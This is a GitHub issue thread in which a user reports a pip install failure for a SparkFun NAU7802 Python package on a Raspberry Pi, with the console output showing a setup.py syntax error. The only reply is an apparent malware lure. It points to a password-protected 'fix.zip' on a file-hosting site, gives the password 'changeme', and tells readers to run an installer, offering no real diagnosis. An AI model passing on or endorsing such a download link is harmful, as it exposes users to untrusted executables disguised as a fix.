### ISSUE TITLE
installation issue

### ISSUE THREAD

**Issue by DS-Bumblebee** [sparkfun/Qwiic_NAU7802_Py#2]
Hello, sorry to bother I cant seem to get this package installed and working on a Raspberry Pi 3. I tried with multiple commands such as git clone and running setup or pip install with no luck getting errors on the setup.py file can you please help?

here is console output  

pip3 install git+https://github.com/sparkfun/Qwiic_NAU7802_Py.git
WARNING: pip is being invoked by an old script wrapper. This will fail in a future version of pip.
Please see https://github.com/pypa/pip/issues/5599 for advice on fixing the underlying issue.
To avoid this problem you can invoke Python with '-m pip' instead of running pip directly.
DEPRECATION: Python 3.5 reached the end of its life on September 13th, 2020. Please upgrade your Python as Python 3.5 is no longer maintaine
d. pip 21.0 will drop support for Python 3.5 in January 2021. pip 21.0 will remove support for this functionality.                          Defaulting to user installation because normal site-packages is not writeable
Looking in indexes: https://pypi.org/simple, https://www.piwheels.org/simple
Collecting git+https://github.com/sparkfun/Qwiic_NAU7802_Py.git
  Cloning https://github.com/sparkfun/Qwiic_NAU7802_Py.git to /tmp/pip-req-build-8v6277_o
  Running command git clone -q https://github.com/sparkfun/Qwiic_NAU7802_Py.git /tmp/pip-req-build-8v6277_o
    ERROR: Command errored out with exit status 1:
     command: /usr/bin/python3 -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-req-build-8v6277_o/setup.py'"'"'; __file__=
'"'"'/tmp/pip-req-build-8v6277_o/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(__file__);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, __file__, '"'"'exec'"'"'))' egg_info --egg-base /tmp/pip-pip-egg-info-_7erq6a1                               cwd: /tmp/pip-req-build-8v6277_o/
    Complete output (6 lines):
    Traceback (most recent call last):
      File "<string>", line 1, in <module>
      File "/tmp/pip-req-build-8v6277_o/setup.py", line 103
        },
        ^
    SyntaxError: invalid syntax
    ----------------------------------------
WARNING: Discarding git+https://github.com/sparkfun/Qwiic_NAU7802_Py.git. Command errored out with exit status 1: python setup.py egg_info C
heck the logs for full command output.                                                                                                      ERROR: Command errored out with exit status 1: python setup.py egg_info Check the logs for full command output.

thanks so much

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
